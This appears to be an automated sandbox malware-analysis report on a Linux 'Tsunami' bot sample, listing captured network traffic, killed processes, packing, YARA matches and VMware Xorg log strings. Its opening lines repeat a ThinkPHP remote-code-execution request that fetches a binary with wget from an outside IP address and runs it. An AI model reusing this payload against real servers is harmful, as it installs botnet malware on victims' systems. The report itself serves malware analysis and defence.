    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0

    System Summary:

    Sample tries to kill many processes (SIGKILL)
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 936, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 720, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 759, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 761, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 788, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 797, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 799, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 800, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 847, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 884, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 1334, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 1335, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 1860, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 1872, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2048, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2180, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2208, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2275, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2281, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2285, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2289, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 2294, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5272, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5285, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5572, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5709, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5855, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 5858, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6122, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6242, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6312, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6315, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6583, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6700, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6709, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6715, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6731, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6992, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 6997, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 7118, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 7129, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 7135, result: successful
    Source: /tmp/Tsunami.x86 (PID: 5253)SIGKILL sent: pid: 7143, result: successful
    Source: LOAD without section mappingsProgram segment: 0xc01000
    Source: 5246.1.0000000081fd3d8d.00000000664d72ba.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
    Source: 5244.1.0000000081fd3d8d.00000000664d72ba.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
    Source: 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
    Source: 5246.1.000000001a887bdc.00000000934a2024.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
    Source: Initial sampleString containing 'busybox' found: `busybox+w|t+
    Source: Tsunami.x86 Joe Sandbox Cloud Basic: Detection: clean Score: 0
    Source: classification engineClassification label: mal88.spre.troj.evad.linX86@0/106@0/0

    Data Obfuscation:

    Sample is packed with UPX
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

    Persistence and Installation Behavior:

    Sample reads /proc/mounts (often used for finding a writable filesystem)
    Source: /usr/bin/dbus-daemon (PID: 5795)File: /proc/5795/mounts
    Source: /usr/bin/dbus-daemon (PID: 6283)File: /proc/6283/mounts
    Source: /usr/bin/dbus-daemon (PID: 7540)File: /proc/7540/mounts
    Source: /bin/sh (PID: 5728)Grep executable: /usr/bin/grep -> grep -F .utf8
    Source: /bin/sh (PID: 6252)Grep executable: /usr/bin/grep -> grep -F .utf8
    Source: /bin/sh (PID: 6708)Grep executable: /usr/bin/grep -> grep -F .utf8
    Source: /bin/sh (PID: 7126)Grep executable: /usr/bin/grep -> grep -F .utf8
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6254/status
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6265/comm
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6265/cgroup
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6268/stat
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6268/comm
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6268/cgroup
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/1/environ
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/1/sched
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/1/cgroup
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/1/comm
    Source: /lib/systemd/systemd (PID: 6254)File opened: /proc/6259/comm
    Source: /lib/systemd/systemd (PID: 6265)Systemctl executable: /bin/systemctl -> /bin/systemctl --user set-environment DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/127/bus
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 5709)Directory: /root/.cache
    Source: /usr/lib/gdm3/gdm-x-session (PID: 5738)Directory: /var/lib/gdm3/.cache
    Source: /usr/lib/gdm3/gdm-x-session (PID: 6256)Directory: /var/lib/gdm3/.cache
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 6242)Directory: /root/.cache
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 6700)Directory: /root/.cache
    Source: /usr/lib/gdm3/gdm-x-session (PID: 6717)Directory: /var/lib/gdm3/.cache
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 7118)Directory: /root/.cache
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 5709)File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 5709)File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 6242)File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 6242)File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 6700)File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 6700)File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 7118)File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 7118)File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)
    Source: /usr/share/language-tools/language-options (PID: 5726)Shell command executed: sh -c "locale -a | grep -F .utf8 "
    Source: /usr/lib/xorg/Xorg (PID: 5773)Shell command executed: sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
    Source: /usr/lib/xorg/Xorg (PID: 6278)Shell command executed: sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
    Source: /usr/share/language-tools/language-options (PID: 6248)Shell command executed: sh -c "locale -a | grep -F .utf8 "
    Source: /usr/share/language-tools/language-options (PID: 6706)Shell command executed: sh -c "locale -a | grep -F .utf8 "
    Source: /usr/lib/xorg/Xorg (PID: 7533)Shell command executed: sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
    Source: /usr/share/language-tools/language-options (PID: 7124)Shell command executed: sh -c "locale -a | grep -F .utf8 "
    Source: /usr/bin/xfce4-session (PID: 5712)Rm executable: /usr/bin/rm -> rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
    Source: /usr/lib/xorg/Xorg (PID: 5742)Log file created: /var/log/Xorg.0.log
    Source: /usr/lib/xorg/Xorg (PID: 6258)Log file created: /var/log/Xorg.0.log
    Source: /usr/lib/xorg/Xorg (PID: 6719)Log file created: /var/log/Xorg.0.log

    Hooking and other Techniques for Hiding and Protection:

    Uses known network protocols on non-standard ports
    Source: /usr/bin/pulseaudio (PID: 5713)Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/lib/xorg/Xorg (PID: 5742)Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/lib/xorg/Xorg (PID: 6258)Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/lib/xorg/Xorg (PID: 6719)Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /lib/systemd/systemd-resolved (PID: 5285)Queries kernel information via 'uname':
    Source: /usr/bin/pulseaudio (PID: 5713)Queries kernel information via 'uname':
    Source: /usr/lib/gdm3/gdm-session-worker (PID: 5731)Queries kernel information via 'uname':
    Source: /usr/lib/gdm3/gdm-x-session (PID: 5738)Queries kernel information via 'uname':
    Source: /usr/lib/xorg/Xorg (PID: 5742)Queries kernel information via 'uname':
    Source: /lib/systemd/systemd-resolved (PID: 5858)Queries kernel information via 'uname':
    Source: /usr/lib/gdm3/gdm-session-worker (PID: 6239)Queries kernel information via 'uname':
    Source: /usr/lib/gdm3/gdm-x-session (PID: 6256)Queries kernel information via 'uname':
    Source: /usr/lib/xorg/Xorg (PID: 6258)Queries kernel information via 'uname':
    Source: /lib/systemd/systemd-resolved (PID: 6315)Queries kernel information via 'uname':
    Source: /usr/lib/gdm3/gdm-session-worker (PID: 6709)Queries kernel information via 'uname':
    Source: /usr/lib/gdm3/gdm-x-session (PID: 6717)Queries kernel information via 'uname':
    Source: /usr/lib/xorg/Xorg (PID: 6719)Queries kernel information via 'uname':
    Source: /lib/systemd/systemd-resolved (PID: 6731)Queries kernel information via 'uname':
    Source: /usr/lib/gdm3/gdm-session-worker (PID: 7129)Queries kernel information via 'uname':
    Source: /lib/systemd/systemd-resolved (PID: 7143)Queries kernel information via 'uname':
    Source: /usr/lib/xorg/Xorg (PID: 5742)Truncated file: /var/log/Xorg.pid-5742.log
    Source: /usr/lib/xorg/Xorg (PID: 6258)Truncated file: /var/log/Xorg.pid-6258.log
    Source: /usr/lib/xorg/Xorg (PID: 6719)Truncated file: /var/log/Xorg.pid-6719.log
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.118] (II) vmware(0): Modeline "vmwlegacy-default-800x600"x60.0 36.25 800 801 802 1002 600 601 602 603 (36.2 kHz ez)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.217] (**) vmware(0): Default mode "1024x768": 75.0 MHz, 56.5 kHz, 70.1 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.758] (II) vmware(0): Not using default mode "960x540" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.306] (**) vmware(0): Default mode "640x350": 31.5 MHz, 37.9 kHz, 85.1 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.229] (II) vmware(0): Modeline "864x486"x59.9 32.50 864 888 968 1072 486 489 494 506 -hsync +vsync (30.3 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 542.719] (==) Matched vmware as autoconfigured driver 0
    Source: Xorg.0.log.152.drBinary or memory string: [ 586.515] (WW) vmware(0): Disabling Render Acceleration.
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.128] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.617] (II) vmware(0): Not using default mode "720x450" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 556.376] (II) event3 - VirtualPS/2 VMware VMMouse: device is a pointer
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.003] (II) vmware(0): Not using default mode "1400x900" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.729] (II) vmware(0): Modeline "1152x864"x70.0 96.77 1152 1224 1344 1536 864 865 868 900 -hsync +vsync (63.0 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.281] (II) vmware(0): Not using default mode "416x312" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.677] (II) vmware(0): Not using default mode "1920x1440" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.207] (II) vmware(0): Modeline "800x600"x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync (37.9 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.154] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 556.311] (**) VirtualPS/2 VMware VMMouse: Applying InputClass "libinput pointer catchall"
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.484] (II) event3 - VirtualPS/2 VMware VMMouse: device removed
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.174] (**) vmware(0): Default mode "1152x864": 105.0 MHz, 67.6 kHz, 75.0 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.521] (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.409] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.797] (II) event2 - VirtualPS/2 VMware VMMouse: device is a pointer
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.865] (**) vmware(0): Default mode "832x624": 57.3 MHz, 49.7 kHz, 74.6 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.944] (II) vmware(0): Not using default mode "512x384i" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.616] (II) vmware(0): Not using default mode "2048x1536" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.381] (II) vmware(0): Not using default mode "896x672" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.084] (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.795] (II) vmware(0): Not using default mode "2560x1440" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.733] (II) vmware(0): Not using default mode "684x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.188] (**) vmware(0): Default mode "800x600": 49.5 MHz, 46.9 kHz, 75.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.387] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.285] (**) vmware(0): Default mode "800x600": 50.0 MHz, 48.1 kHz, 72.2 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 457.807] (WW) vmware(0): Disabling RandR12+ support.
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.720] (II) vmware(0): Not using default mode "1368x768" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.645] (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.831] (II) vmware(0): Not using default mode "640x360" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 547.056] (II) vmware(0): Not using default mode "1280x1024" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 594.275] (II) vmware(0): Modeline "640x480"x75.0 31.50 640 656 720 840 480 481 484 500 -hsync -vsync (37.5 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.548] (--) vmware(0): w.red: 8
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.111] (II) vmware(0): Not using default mode "640x360" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.265] (II) vmware(0): Modeline "720x405"x59.5 22.50 720 744 808 896 405 408 413 422 -hsync +vsync (25.1 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.362] (II) vmware(0): Modeline "640x480"x59.9 25.18 640 656 752 800 480 490 492 525 -hsync -vsync (31.5 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.826] (II) vmware(0): Not using default mode "1440x810" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.357] (II) vmware(0): Not using default mode "640x512" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.830] (II) vmware(0): Modeline "1024x768"x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync (48.4 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.580] (II) event3 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.588] (II) vmware(0): Not using default mode "2560x1440" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.882] (**) vmware(0): Default mode "960x540": 40.8 MHz, 33.5 kHz, 59.6 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 556.710] (**) VirtualPS/2 VMware VMMouse: (accel) acceleration threshold: 4
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.932] (II) vmware(0): Not using default mode "7680x4320" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.197] (II) vmware(0): Modeline "800x600"x72.2 50.00 800 856 976 1040 600 637 643 666 +hsync +vsync (48.1 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.759] (II) vmware(0): Not using default mode "720x405" (monitor doesn't support reduced blanking)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.498] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.144] (II) vmware(0): Modeline "1024x576"x59.9 46.50 1024 1064 1160 1296 576 579 584 599 -hsync +vsync (35.9 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.669] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.348] (**) vmware(0): Default mode "640x480": 31.5 MHz, 37.9 kHz, 72.8 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.870] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.301] (**) vmware(0): Default mode "800x600": 36.0 MHz, 35.2 kHz, 56.2 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.514] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.721] (II) vmware(0): Not using default mode "2048x1536" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.611] (II) vmware(0): Not using default mode "1024x768" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.914] (**) vmware(0): Default mode "800x600": 49.5 MHz, 46.9 kHz, 75.0 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 547.125] (II) vmware(0): Not using default mode "640x512" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.291] (II) vmware(0): Not using default mode "512x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 594.469] (**) vmware(0): Default mode "640x400": 31.5 MHz, 37.9 kHz, 85.1 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.333] (II) vmware(0): Not using default mode "1024x576" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.081] (II) vmware(0): Modeline "vmwlegacy-default-800x600"x60.0 36.25 800 801 802 1002 600 601 602 603 (36.2 kHz ez)
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.974] (II) vmware(0): Not using default mode "5120x2880" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.250] (II) vmware(0): Not using default mode "680x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.717] (II) vmware(0): Not using default mode "960x720" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.271] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.795] (II) vmware(0): Not using default mode "320x180" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.994] (II) vmware(0): Not using default mode "2560x1440" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.896] (II) vmware(0): Not using default mode "2048x1152" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 596.836] (II) vmware(0): Initialized VMware Xinerama extension.
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.849] (II) vmware(0): Not using default mode "684x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.082] (II) vmware(0): Not using default mode "1280x1024" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.174] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 547.694] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
